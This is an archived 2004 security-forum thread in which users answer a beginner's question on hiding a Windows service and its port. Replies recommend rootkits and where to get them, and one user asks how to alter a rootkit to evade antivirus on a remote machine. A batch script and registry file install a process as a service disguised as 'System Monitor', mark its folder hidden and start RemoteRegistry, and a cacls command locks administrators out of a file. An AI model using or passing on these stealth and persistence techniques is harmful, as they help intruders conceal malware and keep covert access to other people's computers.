hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > System Security > Beginners Section
night^man
Mar 31 2004, 11:00 AM
just wana know how to hide service name and his port ? unsure.gif
dont-staY
Mar 31 2004, 11:05 AM
you can hide your service name and port with HXDEF Rootkit. It's detected by av-programs but you can modify it.
night^man
Mar 31 2004, 11:11 AM
were i can find it ?
willywutz
Mar 31 2004, 11:35 AM
Check

http://www.governmentsecurity.org/forum/in...topic=6268&st=0
aapje
Mar 31 2004, 12:09 PM
google....


http://hxdef.czweb.org/main.php
Stephen79
Mar 31 2004, 01:13 PM
HERE http://www.rootkit.com/ is a great place to start biggrin.gif

good luck, and play safe biggrin.gif
allik
Mar 31 2004, 07:17 PM
hi ppl wink.gif
i wanted to start a new thread but still havent the permissions rolleyes.gif

i got the FU_rootkit here anybody knows something about that and how to edit it to run it on a remote machine??? without beeing detected by AV's wink.gif
fre4k
Mar 31 2004, 07:29 PM
QUOTE (night^man @ Mar 31 2004, 11:00 AM)
just wana know how to hide service name and his port ? unsure.gif

to hide a service type:

attrib +h c:\blabla\bal.exe

now it is invisible wink.gif

more attributes are...

attrib +h

attrib +r

attrib +s

and you can use all at the the .exe

attrib +h +r +s c:\blabla\bla.exe


du close a port, just take a backd00r wink.gif
They can often close ports etc.. wink.gif



-fre4k
Cyrus
Mar 31 2004, 08:04 PM
QUOTE (fre4k @ Mar 31 2004, 07:29 PM)
QUOTE (night^man @ Mar 31 2004, 11:00 AM)
just wana know how to hide service name and his port ? unsure.gif

to hide a service type:

attrib +h c:\blabla\bal.exe

now it is invisible wink.gif

more attributes are...

attrib +h

attrib +r

attrib +s

and you can use all at the the .exe

attrib +h +r +s c:\blabla\bla.exe


du close a port, just take a backd00r wink.gif
They can often close ports etc.. wink.gif



-fre4k

lol
this attributes are just for normal files and NOT for services. So use HXDEF .
tianzhen
Apr 6 2004, 05:51 PM
AFX Windows Rootkit 2003 is also a good choice ,
cougar
Apr 6 2004, 07:13 PM
you can also use hiderun.exe **program name** , and add it to winservices.exe. this way it will startup when windows starts.

smile.gif
da_cash
Apr 7 2004, 02:09 PM
you may create .bat like this


CODE
@echo off
net stop system
attrib +a +h +s c:\winnt\system32\drivers\
c:\winnt\system32\drivers\instsrv.exe System c:\winnt\system32\drivers\svchost.exe
net start RemoteRegistry
regedit /s c:\winnt\system32\drivers\service.reg
net start System



where svchost.exe is just renamed srvany.exe


service.reg :

CODE
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\System]
"DisplayName"="System Monitor"
"Description"="Tracks system events such as winnt logon, network, and power events.  Notifies COM+ Event System subscribers of these events."

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\System\Parameters]
"Application"="c:\\winnt\\system32\\drivers\\system.exe"



where system.exe is an process you want to hide..

to hide port you may use AFX rootkit ( fine GUI) or modded Hacker Defender ( modding tutorial on forum)

another option to hide files is cacls.exe

example CACLS.EXE TEST.DLL /D ADMINISTRATOR /Y

this will hide test.dll for administrator smile.gif
migo
Apr 7 2004, 03:12 PM
HXDEF is the best for me

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.